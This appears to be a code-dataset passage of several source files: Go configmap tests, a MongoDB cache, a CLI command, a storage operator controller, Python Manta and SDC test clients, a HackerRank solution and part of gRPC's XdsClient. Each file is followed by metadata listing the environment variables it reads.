WithNamespace(tc.namespace),
)
r, err := source.Read()
if err != nil {
t.Errorf("not able to read the config values because: %v", err)
return
}
if string(r.Data) != string(data) {
t.Logf("data expected: %v", string(data))
t.Logf("data got from configmap: %v", string(r.Data))
t.Errorf("data from configmap does not match.")
}
})
}
}
func TestConfigmap_String(t *testing.T) {
if tr := os.Getenv("TRAVIS"); len(tr) > 0 {
return
}
source := NewSource()
if source.String() != "configmap" {
t.Errorf("expecting to get %v and instead got %v", "configmap", source)
}
}
func TestNewSource(t *testing.T) {
if tr := os.Getenv("TRAVIS"); len(tr) > 0 {
return
}
conf := config.NewConfig()
conf.Load(NewSource())
if mongodbHost := conf.Get("mongodb", "host").String("localhost"); mongodbHost != "127.0.0.1" {
t.Errorf("expected %v and got %v", "127.0.0.1", mongodbHost)
}
if configPort := conf.Get("config", "port").Int(1337); configPort != 1337 {
t.Errorf("expected %v and got %v", "1337", configPort)
}
}
|
[
"\"TRAVIS\"",
"\"HOME\"",
"\"TRAVIS\"",
"\"TRAVIS\"",
"\"TRAVIS\"",
"\"TRAVIS\""
] |
[] |
[
"HOME",
"TRAVIS"
] |
[]
|
["HOME", "TRAVIS"]
|
go
| 2 | 0 | |
macchiato.go
|
package macchiato
import (
"os"
"log"
"bytes"
"errors"
"strings"
"context"
"reflect"
"encoding/gob"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/mongo"
"go.mongodb.org/mongo-driver/mongo/options"
)
type Cache struct {
client *mongo.Client
collection *mongo.Collection
Gob string
}
type Config struct {
MongoURI string
Database string
Collection string
}
type CacheCast struct {
Interface interface{}
}
type CacheDB struct {
ID string `bson:"id"`
Content []byte `bson:"content"`
Type string `bson:"type"`
}
func (c *Cache) Register(i interface{}) {
gob.Register(i)
}
func NewCache(config *Config) (*Cache, error) {
var err error
var database string
var collection string
var cache Cache
//We will register in gob our fake struct
gob.Register(CacheCast{})
if (config.MongoURI == "") {
err = errors.New("Mongo URI cannot be empty")
}
//If Database is null, we will use "macchiato" as default
if (config.Database == "") {
database = "macchiato"
} else {
database = config.Database
}
//If Collection is null, we will use "cache" as default
if (config.Collection == "") {
collection = "cache"
} else {
collection = config.Collection
}
//Preparing client
clientOptions := options.Client().ApplyURI(os.Getenv("MONGO_URI"))
cache.client, err = mongo.Connect(context.TODO(), clientOptions)
if err != nil {
return &Cache{}, err
}
//We will test now the DB
err = cache.client.Ping(context.TODO(), nil)
if err != nil {
return &Cache{}, err
}
//Now we will set the collection
cache.collection = cache.client.Database(database).Collection(collection)
return &cache, nil
}
func (c *Cache) Disconnect() error {
err := c.client.Disconnect(context.TODO())
return err
}
func (c *Cache) RawGet(s string) ([]byte, bool) {
var found bool
var err error
var result []byte
var resultDB CacheDB
err = c.collection.FindOne(context.TODO(), bson.M{ "id": s }).Decode(&resultDB)
if err != nil {
if ! (strings.Contains(err.Error(), "no documents")) {
return nil, false
}
}
if (resultDB.ID != "") {
found = true
result = resultDB.Content
}
return result, found
}
func (c *Cache) Get(s string) (interface{}, bool) {
var found bool
var err error
var b bytes.Buffer
var result interface{}
var resultDB CacheDB
err = c.collection.FindOne(context.TODO(), bson.M{ "id": s }).Decode(&resultDB)
if err != nil {
if ! (strings.Contains(err.Error(), "no documents")) {
return nil, false
}
}
if (resultDB.ID != "") {
found = true
b.Write(resultDB.Content)
d := gob.NewDecoder(&b)
var resultTmp CacheCast
err = d.Decode(&resultTmp)
if err != nil {
log.Println("ERROR", err)
return nil, false
}
result = resultTmp.Interface
}
return result, found
}
func (c *Cache) RawSet(s string, i []byte, n int) (error) {
var resultDB CacheDB
var err error
resultDB.ID = s
resultDB.Content = i
upFilter := bson.M{
"$and": bson.A{
bson.M{
"id": bson.M{
"$eq": resultDB.ID,
},
},
},
}
upMsg := bson.M{
"$set": resultDB,
}
_, err = c.collection.UpdateMany(context.TODO(), upFilter, upMsg, options.Update().SetUpsert(true))
return err
}
func (c *Cache) Set(s string, i interface{}, n int) (error) {
var b bytes.Buffer
var resultDB CacheDB
var err error
e := gob.NewEncoder(&b)
e.Encode(CacheCast{ Interface: i})
if err != nil {
return err
}
resultDB.ID = s
resultDB.Type = reflect.TypeOf(i).String()
resultDB.Content = b.Bytes()
upFilter := bson.M{
"$and": bson.A{
bson.M{
"id": bson.M{
"$eq": resultDB.ID,
},
},
},
}
upMsg := bson.M{
"$set": resultDB,
}
_, err = c.collection.UpdateMany(context.TODO(), upFilter, upMsg, options.Update().SetUpsert(true))
return err
}
func (c *Cache) Del(s string) (error) {
_, err := c.collection.DeleteMany(context.TODO(), bson.M{ "id": s })
if err != nil {
return err
}
return err
}
|
[
"\"MONGO_URI\""
] |
[] |
[
"MONGO_URI"
] |
[]
|
["MONGO_URI"]
|
go
| 1 | 0 | |
cmd/create_datum.go
|
package cmd
import (
"errors"
"fmt"
"os"
"strconv"
"github.com/spf13/cobra"
"github.com/growlog/things-server/internal/models"
)
func init() {
rootCmd.AddCommand(createFloatDatumCmd)
}
var createFloatDatumCmd = &cobra.Command{
Use: "create_datum [FIELDS]",
Short: "Create time-series (float) datum.",
Long: `Command used to create a single time series (float) datum for the particular sensor.`,
Args: func(cmd *cobra.Command, args []string) error {
if len(args) < 4 {
return errors.New("requires the following fields: tenantId, sensorId, value, timestamp")
}
return nil
},
Run: func(cmd *cobra.Command, args []string) {
// Get our user arguments.
tenantIdString := args[0]
sensorIdString := args[1]
valueString := args[2]
timestampString := args[3]
// Minor modifications.
tenantId, _ := strconv.ParseInt(tenantIdString, 10, 64)
sensorId, _ := strconv.ParseInt(sensorIdString, 10, 64)
value, _ := strconv.ParseFloat(valueString, 64) // create `float64` primitive
timestamp, _ := strconv.ParseInt(timestampString, 10, 64)
// Load up our `environment variables` from our operating system.
dbHost := os.Getenv("GROWLOG_THING_DB_HOST")
dbPort := os.Getenv("GROWLOG_THING_DB_PORT")
dbUser := os.Getenv("GROWLOG_THING_DB_USER")
dbPassword := os.Getenv("GROWLOG_THING_DB_PASSWORD")
dbName := os.Getenv("GROWLOG_THING_DB_NAME")
// Initialize and connect our database layer for the command.
dal := models.InitDataAccessLayer(dbHost, dbPort, dbUser, dbPassword, dbName)
dal.CreateThingTable(false)
dal.CreateSensorTable(false)
dal.CreateTimeSeriesDatumTable(false)
datum, err := dal.CreateTimeSeriesDatum(tenantId, sensorId, value, timestamp)
if err != nil {
fmt.Println("Failed creating time-series (float) datum!")
fmt.Println(err)
} else {
fmt.Println("Time-series (float) datum created with ID #", datum.Id)
}
},
}
|
[
"\"GROWLOG_THING_DB_HOST\"",
"\"GROWLOG_THING_DB_PORT\"",
"\"GROWLOG_THING_DB_USER\"",
"\"GROWLOG_THING_DB_PASSWORD\"",
"\"GROWLOG_THING_DB_NAME\""
] |
[] |
[
"GROWLOG_THING_DB_HOST",
"GROWLOG_THING_DB_USER",
"GROWLOG_THING_DB_PASSWORD",
"GROWLOG_THING_DB_PORT",
"GROWLOG_THING_DB_NAME"
] |
[]
|
["GROWLOG_THING_DB_HOST", "GROWLOG_THING_DB_USER", "GROWLOG_THING_DB_PASSWORD", "GROWLOG_THING_DB_PORT", "GROWLOG_THING_DB_NAME"]
|
go
| 5 | 0 | |
test/common.py
|
#!/usr/bin/env python
# Copyright (c) 2012 Joyent, Inc. All rights reserved.
"""Shared code for test case files."""
__all__ = ["stor", "MantaTestCase"]
import sys
import os
from posixpath import join as ujoin
import unittest
import subprocess
from subprocess import PIPE
import manta
#---- exports
def stor(*subpaths):
MANTA_USER = os.environ['MANTA_USER']
if not subpaths:
return '/%s/stor' % MANTA_USER
subpath = ujoin(*subpaths)
if subpath.startswith("/"):
subpath = subpath[1:]
return "/%s/stor/%s" % (MANTA_USER, subpath)
class MantaTestCase(unittest.TestCase):
def __init__(self, *args):
self.account = os.environ["MANTA_USER"]
self.subuser = os.environ.get("MANTA_SUBUSER", None)
self.role = os.environ.get("MANTA_ROLE", None)
unittest.TestCase.__init__(self, *args)
_client = None
def get_client(self):
MANTA_URL = os.environ['MANTA_URL']
MANTA_KEY_ID = os.environ['MANTA_KEY_ID']
MANTA_TLS_INSECURE = bool(os.environ.get('MANTA_TLS_INSECURE', False))
if not self._client:
signer = manta.CLISigner(key_id=MANTA_KEY_ID)
self._client = manta.MantaClient(url=MANTA_URL,
account=self.account,
subuser=self.subuser,
role=self.role,
signer=signer,
# Uncomment this for verbose client output for test run.
#verbose=True,
disable_ssl_certificate_validation=MANTA_TLS_INSECURE)
return self._client
def mantash(self, args):
mantash = os.path.realpath(
os.path.join(os.path.dirname(__file__), "..", "bin", "mantash"))
argv = [sys.executable, mantash]
MANTA_INSECURE = bool(os.environ.get('MANTA_INSECURE', False))
if MANTA_INSECURE:
argv.append('-k')
argv += args
p = subprocess.Popen(argv, shell=False, stdout=PIPE, stderr=PIPE,
close_fds=True)
p.wait()
stdout = p.stdout.read()
stderr = p.stderr.read()
code = p.returncode
return code, stdout, stderr
|
[] |
[] |
[
"MANTA_SUBUSER",
"MANTA_KEY_ID",
"MANTA_INSECURE",
"MANTA_URL",
"MANTA_USER",
"MANTA_TLS_INSECURE",
"MANTA_ROLE"
] |
[]
|
["MANTA_SUBUSER", "MANTA_KEY_ID", "MANTA_INSECURE", "MANTA_URL", "MANTA_USER", "MANTA_TLS_INSECURE", "MANTA_ROLE"]
|
python
| 7 | 0 | |
controllers/storagecluster/storagecluster_controller.go
|
package storagecluster
import (
"fmt"
"os"
"github.com/go-logr/logr"
nbv1 "github.com/noobaa/noobaa-operator/v2/pkg/apis/noobaa/v1alpha1"
conditionsv1 "github.com/openshift/custom-resource-status/conditions/v1"
"github.com/operator-framework/operator-lib/conditions"
ocsv1 "github.com/red-hat-storage/ocs-operator/api/v1"
"github.com/red-hat-storage/ocs-operator/controllers/util"
cephv1 "github.com/rook/rook/pkg/apis/ceph.rook.io/v1"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/version"
"k8s.io/client-go/kubernetes"
ctrl "sigs.k8s.io/controller-runtime"
"sigs.k8s.io/controller-runtime/pkg/builder"
"sigs.k8s.io/controller-runtime/pkg/client"
"sigs.k8s.io/controller-runtime/pkg/client/config"
"sigs.k8s.io/controller-runtime/pkg/event"
"sigs.k8s.io/controller-runtime/pkg/predicate"
)
var (
log = ctrl.Log.WithName("controllers").WithName("StorageCluster")
)
func (r *StorageClusterReconciler) initializeImageVars() error {
r.images.Ceph = os.Getenv("CEPH_IMAGE")
r.images.NooBaaCore = os.Getenv("NOOBAA_CORE_IMAGE")
r.images.NooBaaDB = os.Getenv("NOOBAA_DB_IMAGE")
if r.images.Ceph == "" {
err := fmt.Errorf("CEPH_IMAGE environment variable not found")
r.Log.Error(err, "Missing CEPH_IMAGE environment variable for ocs initialization.")
return err
} else if r.images.NooBaaCore == "" {
err := fmt.Errorf("NOOBAA_CORE_IMAGE environment variable not found")
r.Log.Error(err, "Missing NOOBAA_CORE_IMAGE environment variable for ocs initialization.")
return err
} else if r.images.NooBaaDB == "" {
err := fmt.Errorf("NOOBAA_DB_IMAGE environment variable not found")
r.Log.Error(err, "Missing NOOBAA_DB_IMAGE environment variable for ocs initialization.")
return err
}
return nil
}
func (r *StorageClusterReconciler) initializeServerVersion() error {
clientset, err := kubernetes.NewForConfig(config.GetConfigOrDie())
if err != nil {
r.Log.Error(err, "Failed creation of clientset for determining serverversion.")
return err
}
r.serverVersion, err = clientset.Discovery().ServerVersion()
if err != nil {
r.Log.Error(err, "Failed getting the serverversion.")
return err
}
return nil
}
// ImageMap holds mapping information between component image name and the image url
type ImageMap struct {
Ceph string
NooBaaCore string
NooBaaDB string
}
// StorageClusterReconciler reconciles a StorageCluster object
//nolint
type StorageClusterReconciler struct {
client.Client
Log logr.Logger
Scheme *runtime.Scheme
serverVersion *version.Info
conditions []conditionsv1.Condition
phase string
nodeCount int
platform *Platform
images ImageMap
recorder *util.EventReporter
OperatorCondition conditions.Condition
IsNoobaaStandalone bool
}
// SetupWithManager sets up a controller with manager
func (r *StorageClusterReconciler) SetupWithManager(mgr ctrl.Manager) error {
if err := r.initializeImageVars(); err != nil {
return err
}
if err := r.initializeServerVersion(); err != nil {
return err
}
r.platform = &Platform{}
r.recorder = util.NewEventReporter(mgr.GetEventRecorderFor("controller_storagecluster"))
// Compose a predicate that is an OR of the specified predicates
scPredicate := util.ComposePredicates(
predicate.GenerationChangedPredicate{},
util.MetadataChangedPredicate{},
)
pvcPredicate := predicate.Funcs{
DeleteFunc: func(e event.DeleteEvent) bool {
// Evaluates to false if the object has been confirmed deleted.
return !e.DeleteStateUnknown
},
}
return ctrl.NewControllerManagedBy(mgr).
For(&ocsv1.StorageCluster{}, builder.WithPredicates(scPredicate)).
Owns(&cephv1.CephCluster{}).
Owns(&nbv1.NooBaa{}).
Owns(&corev1.PersistentVolumeClaim{}, builder.WithPredicates(pvcPredicate)).
Complete(r)
}
|
[
"\"CEPH_IMAGE\"",
"\"NOOBAA_CORE_IMAGE\"",
"\"NOOBAA_DB_IMAGE\""
] |
[] |
[
"NOOBAA_CORE_IMAGE",
"CEPH_IMAGE",
"NOOBAA_DB_IMAGE"
] |
[]
|
["NOOBAA_CORE_IMAGE", "CEPH_IMAGE", "NOOBAA_DB_IMAGE"]
|
go
| 3 | 0 | |
examples/ReferenceTest/reference_client.py
|
import time
import traceback
import os
import sdc11073
from collections import defaultdict
from sdc11073 import observableproperties
from sdc11073.definitions_sdc import SDC_v1_Definitions
from concurrent import futures
from sdc11073.certloader import mk_ssl_context_from_folder
adapter_ip = os.getenv('ref_ip') or '127.0.0.1'
ca_folder = os.getenv('ref_ca')
ssl_passwd = os.getenv('ref_ssl_passwd') or None
search_epr = os.getenv('ref_search_epr') or 'abc' # abc is fixed ending in reference_device uuid.
def run_ref_test():
results = []
print('Test step 1: discover device which endpoint ends with "{}"'.format(search_epr))
wsd = sdc11073.wsdiscovery.WSDiscoveryWhitelist([adapter_ip])
wsd.start()
my_service = None
while my_service is None:
services = wsd.searchServices(types=SDC_v1_Definitions.MedicalDeviceTypesFilter)
print('found {} services {}'.format(len(services), ', '.join([s.getEPR() for s in services])))
for s in services:
if s.getEPR().endswith(search_epr):
my_service = s
print('found service {}'.format(s.getEPR()))
break
print('Test step 1 successful: device discovered')
results.append('### Test 1 ### passed')
print('Test step 2: connect to device...')
try:
if ca_folder:
ssl_context = mk_ssl_context_from_folder(ca_folder, cyphers_file='client_cyphers.txt',
ssl_passwd=ssl_passwd)
else:
ssl_context = None
client = sdc11073.sdcclient.SdcClient.fromWsdService(my_service,
sslContext=ssl_context)
client.startAll()
print('Test step 2 successful: connected to device')
results.append('### Test 2 ### passed')
except:
print (traceback.format_exc())
results.append('### Test 2 ### failed')
return results
print('Test step 3&4: get mdib and subscribe...')
try:
mdib = sdc11073.mdib.clientmdib.ClientMdibContainer(client)
mdib.initMdib()
print('Test step 3&4 successful')
results.append('### Test 3 ### passed')
results.append('### Test 4 ### passed')
except:
print(traceback.format_exc())
results.append('### Test 3 ### failed')
results.append('### Test 4 ### failed')
return results
print('Test step 5: check that at least one patient context exists')
patients = mdib.contextStates.NODETYPE.get(sdc11073.namespaces.domTag('PatientContextState'), [])
if len(patients) > 0:
print('found {} patients, Test step 5 successful'.format(len(patients)))
results.append('### Test 5 ### passed')
else:
print('found no patients, Test step 5 failed')
results.append('### Test 5 ### failed')
print('Test step 6: check that at least one location context exists')
locations = mdib.contextStates.NODETYPE.get(sdc11073.namespaces.domTag('LocationContextState'), [])
if len(locations) > 0:
print('found {} locations, Test step 6 successful'.format(len(locations)))
results.append('### Test 6 ### passed')
else:
print('found no locations, Test step 6 failed')
results.append('### Test 6 ### failed')
print('Test step 7&8: count metric state updates and alert state updates')
metric_updates = defaultdict(list)
alert_updates = defaultdict(list)
def onMetricUpdates(metricsbyhandle):
print('onMetricUpdates', metricsbyhandle)
for k, v in metricsbyhandle.items():
metric_updates[k].append(v)
def onAlertUpdates(alertsbyhandle):
print('onAlertUpdates', alertsbyhandle)
for k, v in alertsbyhandle.items():
alert_updates[k].append(v)
observableproperties.bind(mdib, metricsByHandle=onMetricUpdates)
observableproperties.bind(mdib, alertByHandle=onAlertUpdates)
sleep_timer = 11
min_updates = sleep_timer // 5 - 1
print('will wait for {} seconds now, expecting at least {} updates per handle'.format(sleep_timer, metric_updates))
time.sleep(sleep_timer)
print(metric_updates)
print(alert_updates)
for k, v in metric_updates.items():
if len(v) < min_updates:
print('found only {} updates for {}, test step 7 failed'.format(len(v), k))
results.append('### Test 7 ### failed')
else:
print('found {} updates for {}, test step 7 ok'.format(len(v), k))
results.append('### Test 7 ### passed')
for k, v in alert_updates.items():
if len(v) < min_updates:
print('found only {} updates for {}, test step 8 failed'.format(len(v), k))
results.append('### Test 8 ### failed')
else:
print('found {} updates for {}, test step 8 ok'.format(len(v), k))
results.append('### Test 8 ### passed')
print('Test step 9: call SetString operation')
setstring_operations = mdib.descriptions.NODETYPE.get(sdc11073.namespaces.domTag('SetStringOperationDescriptor'), [])
setst_handle = 'string.ch0.vmd1_sco_0'
if len(setstring_operations) == 0:
print('Test step 9 failed, no SetString operation found')
results.append('### Test 9 ### failed')
else:
for s in setstring_operations:
if s.handle != setst_handle:
continue
print('setString Op ={}'.format(s))
fut = client.SetService_client.setString(s.handle, 'hoppeldipop')
try:
res = fut.result(timeout=10)
print(res)
if res.state != sdc11073.pmtypes.InvocationState.FINISHED:
print('set string operation {} did not finish with "Fin":{}'.format(s.handle, res))
results.append('### Test 9 ### failed')
else:
print('set value operation {} ok:{}'.format(s.handle, res))
results.append('### Test 9 ### passed')
except futures.TimeoutError:
print('timeout error')
results.append('### Test 9 ### failed')
print('Test step 10: call SetValue operation')
setvalue_operations = mdib.descriptions.NODETYPE.get(sdc11073.namespaces.domTag('SetValueOperationDescriptor'), [])
# print('setvalue_operations', setvalue_operations)
setval_handle = 'numeric.ch0.vmd1_sco_0'
if len(setvalue_operations) == 0:
print('Test step 10 failed, no SetValue operation found')
results.append('### Test 10 ### failed')
else:
for s in setvalue_operations:
if s.handle != setval_handle:
continue
print('setNumericValue Op ={}'.format(s))
fut = client.SetService_client.setNumericValue(s.handle, 42)
try:
res = fut.result(timeout=10)
print(res)
if res.state != sdc11073.pmtypes.InvocationState.FINISHED:
print('set value operation {} did not finish with "Fin":{}'.format(s.handle, res))
else:
print('set value operation {} ok:{}'.format(s.handle, res))
results.append('### Test 10 ### passed')
except futures.TimeoutError:
print('timeout error')
results.append('### Test 10 ### failed')
return results
if __name__ == '__main__':
results = run_ref_test()
for r in results:
print(r)
|
[] |
[] |
[
"ref_ip",
"ref_ca",
"ref_ssl_passwd",
"ref_search_epr"
] |
[]
|
["ref_ip", "ref_ca", "ref_ssl_passwd", "ref_search_epr"]
|
python
| 4 | 0 | |
Algorithms/Implementation/Picking_Numbers.java
|
import java.io.*;
import java.math.*;
import java.security.*;
import java.text.*;
import java.util.*;
import java.util.concurrent.*;
import java.util.function.*;
import java.util.regex.*;
import java.util.stream.*;
import static java.util.stream.Collectors.joining;
import static java.util.stream.Collectors.toList;
class Result {
public static int pickingNumbers(List<Integer> numbers) {
Collections.sort(numbers);
int lastOneValueAwayNumber = numbers.get(0);
int currentOneValueAwayCount = 1;
int maxOneAwayCount = 1;
for (int i = 1; i < numbers.size(); i++) {
if (numbers.get(i) - lastOneValueAwayNumber <= 1) {
currentOneValueAwayCount++;
}
else {
maxOneAwayCount = currentOneValueAwayCount > maxOneAwayCount ? currentOneValueAwayCount : maxOneAwayCount;
currentOneValueAwayCount = 1;
lastOneValueAwayNumber = numbers.get(i);
}
}
return maxOneAwayCount > currentOneValueAwayCount ? maxOneAwayCount : currentOneValueAwayCount;
}
}
public class Solution {
public static void main(String[] args) throws IOException {
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(System.in));
BufferedWriter bufferedWriter = new BufferedWriter(new FileWriter(System.getenv("OUTPUT_PATH")));
int n = Integer.parseInt(bufferedReader.readLine().trim());
List<Integer> a = Stream.of(bufferedReader.readLine().replaceAll("\\s+$", "").split(" "))
.map(Integer::parseInt)
.collect(toList());
int result = Result.pickingNumbers(a);
bufferedWriter.write(String.valueOf(result));
bufferedWriter.newLine();
bufferedReader.close();
bufferedWriter.close();
}
}
|
[
"\"OUTPUT_PATH\""
] |
[] |
[
"OUTPUT_PATH"
] |
[]
|
["OUTPUT_PATH"]
|
java
| 1 | 0 | |
xds/src/main/java/io/grpc/xds/XdsClient.java
|
/*
* Copyright 2019 The gRPC Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.grpc.xds;
import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.base.Preconditions.checkState;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.base.MoreObjects;
import com.google.common.base.Preconditions;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableMap;
import io.grpc.ManagedChannel;
import io.grpc.ManagedChannelBuilder;
import io.grpc.Status;
import io.grpc.alts.GoogleDefaultChannelBuilder;
import io.grpc.internal.ObjectPool;
import io.grpc.xds.Bootstrapper.ChannelCreds;
import io.grpc.xds.Bootstrapper.ServerInfo;
import io.grpc.xds.EnvoyProtoData.DropOverload;
import io.grpc.xds.EnvoyProtoData.Locality;
import io.grpc.xds.EnvoyProtoData.LocalityLbEndpoints;
import io.grpc.xds.EnvoyProtoData.Route;
import io.grpc.xds.EnvoyServerProtoData.Listener;
import io.grpc.xds.EnvoyServerProtoData.UpstreamTlsContext;
import io.grpc.xds.XdsLogger.XdsLogLevel;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.Objects;
import java.util.concurrent.TimeUnit;
import javax.annotation.Nullable;
/**
* An {@link XdsClient} instance encapsulates all of the logic for communicating with the xDS
* server. It may create multiple RPC streams (or a single ADS stream) for a series of xDS
* protocols (e.g., LDS, RDS, VHDS, CDS and EDS) over a single channel. Watch-based interfaces
* are provided for each set of data needed by gRPC.
*/
abstract class XdsClient {
/**
* Data class containing the results of performing a series of resource discovery RPCs via
* LDS/RDS/VHDS protocols. The results may include configurations for path/host rewriting,
* traffic mirroring, retry or hedging, default timeouts and load balancing policy that will
* be used to generate a service config.
*/
static final class ConfigUpdate {
private final List<Route> routes;
private ConfigUpdate(List<Route> routes) {
this.routes = routes;
}
List<Route> getRoutes() {
return routes;
}
@Override
public String toString() {
return
MoreObjects
.toStringHelper(this)
.add("routes", routes)
.toString();
}
static Builder newBuilder() {
return new Builder();
}
static final class Builder {
private final List<Route> routes = new ArrayList<>();
// Use ConfigUpdate.newBuilder().
private Builder() {
}
Builder addRoutes(Collection<Route> route) {
routes.addAll(route);
return this;
}
ConfigUpdate build() {
checkState(!routes.isEmpty(), "routes is empty");
return new ConfigUpdate(Collections.unmodifiableList(routes));
}
}
}
/**
* Data class containing the results of performing a resource discovery RPC via CDS protocol.
* The results include configurations for a single upstream cluster, such as endpoint discovery
* type, load balancing policy, connection timeout and etc.
*/
static final class ClusterUpdate {
private final String clusterName;
@Nullable
private final String edsServiceName;
private final String lbPolicy;
@Nullable
private final String lrsServerName;
private final UpstreamTlsContext upstreamTlsContext;
private ClusterUpdate(
String clusterName,
@Nullable String edsServiceName,
String lbPolicy,
@Nullable String lrsServerName,
@Nullable UpstreamTlsContext upstreamTlsContext) {
this.clusterName = clusterName;
this.edsServiceName = edsServiceName;
this.lbPolicy = lbPolicy;
this.lrsServerName = lrsServerName;
this.upstreamTlsContext = upstreamTlsContext;
}
String getClusterName() {
return clusterName;
}
/**
* Returns the resource name for EDS requests.
*/
@Nullable
String getEdsServiceName() {
return edsServiceName;
}
/**
* Returns the policy of balancing loads to endpoints. Only "round_robin" is supported
* as of now.
*/
String getLbPolicy() {
return lbPolicy;
}
/**
* Returns the server name to send client load reports to if LRS is enabled. {@code null} if
* load reporting is disabled for this cluster.
*/
@Nullable
String getLrsServerName() {
return lrsServerName;
}
/** Returns the {@link UpstreamTlsContext} for this cluster if present, else null. */
@Nullable
UpstreamTlsContext getUpstreamTlsContext() {
return upstreamTlsContext;
}
@Override
public String toString() {
return
MoreObjects
.toStringHelper(this)
.add("clusterName", clusterName)
.add("edsServiceName", edsServiceName)
.add("lbPolicy", lbPolicy)
.add("lrsServerName", lrsServerName)
.add("upstreamTlsContext", upstreamTlsContext)
.toString();
}
@Override
public int hashCode() {
return Objects.hash(
clusterName, edsServiceName, lbPolicy, lrsServerName, upstreamTlsContext);
}
@Override
public boolean equals(Object o) {
if (this == o) {
return true;
}
if (o == null || getClass() != o.getClass()) {
return false;
}
ClusterUpdate that = (ClusterUpdate) o;
return Objects.equals(clusterName, that.clusterName)
&& Objects.equals(edsServiceName, that.edsServiceName)
&& Objects.equals(lbPolicy, that.lbPolicy)
&& Objects.equals(lrsServerName, that.lrsServerName)
&& Objects.equals(upstreamTlsContext, that.upstreamTlsContext);
}
static Builder newBuilder() {
return new Builder();
}
static final class Builder {
private String clusterName;
@Nullable
private String edsServiceName;
private String lbPolicy;
@Nullable
private String lrsServerName;
@Nullable
private UpstreamTlsContext upstreamTlsContext;
// Use ClusterUpdate.newBuilder().
private Builder() {
}
Builder setClusterName(String clusterName) {
this.clusterName = clusterName;
return this;
}
Builder setEdsServiceName(String edsServiceName) {
this.edsServiceName = edsServiceName;
return this;
}
Builder setLbPolicy(String lbPolicy) {
this.lbPolicy = lbPolicy;
return this;
}
Builder setLrsServerName(String lrsServerName) {
this.lrsServerName = lrsServerName;
return this;
}
Builder setUpstreamTlsContext(UpstreamTlsContext upstreamTlsContext) {
this.upstreamTlsContext = upstreamTlsContext;
return this;
}
ClusterUpdate build() {
checkState(clusterName != null, "clusterName is not set");
checkState(lbPolicy != null, "lbPolicy is not set");
return
new ClusterUpdate(
clusterName, edsServiceName, lbPolicy, lrsServerName, upstreamTlsContext);
}
}
}
/**
* Data class containing the results of performing a resource discovery RPC via EDS protocol.
* The results include endpoint addresses running the requested service, as well as
* configurations for traffic control such as drop overloads, inter-cluster load balancing
* policy and etc.
*/
static final class EndpointUpdate {
private final String clusterName;
private final Map<Locality, LocalityLbEndpoints> localityLbEndpointsMap;
private final List<DropOverload> dropPolicies;
private EndpointUpdate(
String clusterName,
Map<Locality, LocalityLbEndpoints> localityLbEndpoints,
List<DropOverload> dropPolicies) {
this.clusterName = clusterName;
this.localityLbEndpointsMap = localityLbEndpoints;
this.dropPolicies = dropPolicies;
}
static Builder newBuilder() {
return new Builder();
}
String getClusterName() {
return clusterName;
}
/**
* Returns a map of localities with endpoints load balancing information in each locality.
*/
Map<Locality, LocalityLbEndpoints> getLocalityLbEndpointsMap() {
return Collections.unmodifiableMap(localityLbEndpointsMap);
}
/**
* Returns a list of drop policies to be applied to outgoing requests.
*/
List<DropOverload> getDropPolicies() {
return Collections.unmodifiableList(dropPolicies);
}
@Override
public boolean equals(Object o) {
if (this == o) {
return true;
}
if (o == null || getClass() != o.getClass()) {
return false;
}
EndpointUpdate that = (EndpointUpdate) o;
return Objects.equals(clusterName, that.clusterName)
&& Objects.equals(localityLbEndpointsMap, that.localityLbEndpointsMap)
&& Objects.equals(dropPolicies, that.dropPolicies);
}
@Override
public int hashCode() {
return Objects.hash(clusterName, localityLbEndpointsMap, dropPolicies);
}
@Override
public String toString() {
return
MoreObjects
.toStringHelper(this)
.add("clusterName", clusterName)
.add("localityLbEndpointsMap", localityLbEndpointsMap)
.add("dropPolicies", dropPolicies)
.toString();
}
static final class Builder {
private String clusterName;
private Map<Locality, LocalityLbEndpoints> localityLbEndpointsMap = new LinkedHashMap<>();
private List<DropOverload> dropPolicies = new ArrayList<>();
// Use EndpointUpdate.newBuilder().
private Builder() {
}
Builder setClusterName(String clusterName) {
this.clusterName = clusterName;
return this;
}
Builder addLocalityLbEndpoints(Locality locality, LocalityLbEndpoints info) {
localityLbEndpointsMap.put(locality, info);
return this;
}
Builder addDropPolicy(DropOverload policy) {
dropPolicies.add(policy);
return this;
}
EndpointUpdate build() {
checkState(clusterName != null, "clusterName is not set");
return
new EndpointUpdate(
clusterName,
ImmutableMap.copyOf(localityLbEndpointsMap),
ImmutableList.copyOf(dropPolicies));
}
}
}
/**
* Updates via resource discovery RPCs using LDS. Includes {@link Listener} object containing
* config for security, RBAC or other server side features such as rate limit.
*/
static final class ListenerUpdate {
// TODO(sanjaypujare): flatten structure by moving Listener class members here.
private final Listener listener;
private ListenerUpdate(Listener listener) {
this.listener = listener;
}
public Listener getListener() {
return listener;
}
@Override
public String toString() {
return MoreObjects.toStringHelper(this)
.add("listener", listener)
.toString();
}
static Builder newBuilder() {
return new Builder();
}
static final class Builder {
private Listener listener;
// Use ListenerUpdate.newBuilder().
private Builder() {
}
Builder setListener(Listener listener) {
this.listener = listener;
return this;
}
ListenerUpdate build() {
checkState(listener != null, "listener is not set");
return new ListenerUpdate(listener);
}
}
}
/**
* Watcher interface for a single requested xDS resource.
*/
private interface ResourceWatcher {
/**
* Called when the resource discovery RPC encounters some transient error.
*/
void onError(Status error);
/**
* Called when the requested resource is not available.
*
* @param resourceName name of the resource requested in discovery request.
*/
void onResourceDoesNotExist(String resourceName);
}
/**
* Config watcher interface. To be implemented by the xDS resolver.
*/
interface ConfigWatcher extends ResourceWatcher {
/**
* Called when receiving an update on virtual host configurations.
*/
void onConfigChanged(ConfigUpdate update);
}
/**
* Cluster watcher interface.
*/
